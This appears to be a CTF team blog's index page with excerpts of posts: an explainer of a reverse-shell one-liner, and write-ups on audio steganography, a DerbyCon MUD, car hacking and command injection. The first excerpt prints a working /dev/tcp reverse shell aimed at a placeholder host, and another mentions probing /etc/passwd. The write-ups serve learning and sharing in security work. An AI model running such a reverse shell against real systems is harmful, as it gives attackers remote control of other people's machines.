"A Gnarly Looking Shell Command " Explained!

Here is a one-liner I recently used on an op that a teammate called a "gnarly looking shell command." And he was right. This is gnarly looking:

sh -c $@ | sh . echo 0<&196;exec 196<>/dev/tcp/X.X.X.X/NNN; sh <&196 >&196 2>&196
My team lead came up with it with it for me about a year ago on a gig where we had RCE but the easier shelling methods were failing. I saved it in my notes and pulled it out the other day because we had RCE on a similar target.
Anyway, seeing a command like that warrants pause and consideration unless you are fluent in command line interpreter lexical structures, and though I know enough to be dangerous, I wanted to better understand the magic of what was happening at a more technical level. So, I thought I would write this all down and share it with everyone.
While writing this blog post; I found some ways to clean it up a bit and make it easier to understand. Let's cover this version of it instead:
exec 196<>/…

2019 Stonecutters - Radioactive Man

The Stonecutters have granted us permission to publish a solve from last year's secret competition. They provided a file named "radio_a_oh_activeman.wav" which was a 30 second clip of the Buggles song "Video Killed the Radio Star." The Stonecutters noted that Radioactive Man has been exhibiting signs of extreme paranoia and they believe that the file contains a secret message intended for Fallout Boy.

 Radioactive Man
Having intercepted the message, we looked at it in audacity and saw a digital signal hidden in the spectrogram:

Digital Signal
Though it is possible to solve this by hand, this was not the route we wanted to take. Using ultrasonic sound to transmit data is best suited for computers in our opinion. So, the problem is now: What tool(s) do we use in order to decode the signal?

We spent more time than we would like to admit playing "guess the tool." There are dozens of github projects and also mobile apps available for this purpose, but none…

New Year. New We.

It has been a while since any of our drafts have gone public and we wanted to start the new year off right by addressing that problem. First, some updates about the team and our content.

For context, the Welcome Thrillhouse Group CTF team was started by @strupo_ with the idea that the team would welcome anyone during onsite CTFs and that we would focus more on knowledge sharing rather than winning. Though winning is always nice, writing up the challenges we solved would be our way of giving something back to the community that we all learn so much from.

But for some reason or another, strupo_ has been the sole contributor to the blog, and that was never the intention. Drunk with power, he imposed his love of the Simpsons and occult symbolism onto the team and made that our brand. Everyone seems to enjoy our flagrant appropriation of Milhouse Van Houten being edgy, but the occult symbolism has raised enough eyebrows for the team to be concerned that maybe we were not being as welcoming…

2019 BSidesRDU - "Noobs Table" Experience and Challenge Write-Up

Welcome Thrillhouse Group attended BSidesRDU this year and instead of competing in the CTF, we contributed a stego challenge and also helped out at the "noobs table."  The idea of a noobs table has been kicked around for a little while now but this was the first time it was formally done at an EverSec CTF. Basically, there was a table in the CTF room reserved for people that are new to CTFs, and a couple of us were there to help with two sets of challenges created just for them. One was posted to the EverSec CTF challenges under the "newbs" category while teamWTG's contribution was a set of, effectively, offline challenges against an IoT device with extremely limited resources.

@uncue created the "newbs" challenges which included everything from service enumeration to lateral movement. Welcome Thrillhouse Group brought the "offline" set of challenges which included service enumeration, finding default credentials, password reuse attacks, a re…

Trudging Through the Derby MUD in Lock Step

For the final DerbyCon CTF, I decided to take on the MUD for team Illuminopi.

Derbycon 9.0 EvilMog CTF MUD
The CTF MUD was created by EvilMog and the world he created was pretty staggering. I really appreciate the effort that he put in to the MUD for us all to enjoy. For those that do not know. a MUD, or Multi-User Dungeon, is a real-time, text based, multiplayer game. You can learn more about them here.

Okay, let's get into it.
Upon your initial login and sign-up, there were more rules, tips, and tricks presented to the player. I mostly ignored everything and went in with tree branches a-blazing!
By the end of the conference; I believe I captured about 4 to 6 thousand points worth of flags in the MUD, and if I recall correctly, I only got about halfway through the challenges.

I attempted to make use of some evenings after the conference to take on the challenges outside of derby and got as high as third place:
Okay maybe I spent a day on it. 
Even with the pictures from a derby f…

DEF CON 27 - Our Car Hacking CTF Experience

The Car Hacking Village CTF at DEF CON 27 was a fun, educational, and humbling event to participate in. We got 9th place, mostly due to luck and tenacity. Before this event, we have not tried to interface with, let alone hack, a vehicle. So, we spent the whole of DEF CON 27 in the CHV CTF to change that. Here's our story...

CHV CTF Final Scoreboard
Unfortunately, we cannot offer up a single write-up for the actual car hacking challenges as we were unable to complete a single one of them. However, there were a lot of trivia questions which sent us down multiple rabbit holes where we learned terms, concepts, and attack vectors that we had zero knowledge of before. The purpose of this post is simply to share our experience and touch on building the nano-can and using a HackRF One to replay a key-fob button press.
Overall, I'd say that going to one of the largest hacking conferences in the world to participate in a hacking competition against something that you have zero experienc…

2019 Stonecutters - The Battle of Gettysburg

Here's our latest write-up for the secret Stonecutters challenge that we've code named "The Battle of Gettysburg."

Somebody is Going to Get Parasites
For this challenge we made use of a tool that automates OS command injection.

Okay, let's get into it.

Similarly to all of the other "Any Key" challenges, I registered my SSH key with the scoring server and I was able to connect to a web server on For more information about this CTF feel free to check out this post.

The web server that loaded was a simple input field that indicated that I needed to check if a file existed and a submit button that said fire.

Naturally, I tried /etc/passwd and here's what I saw:

When I checked for "foo", I saw a message that said "missed."
I then entered /flag.txt and got another hit.

I tried really hard to find an LFI, and I also spent some time attempting to eke out a SQL error. However, commix was the tool that won the Battle o…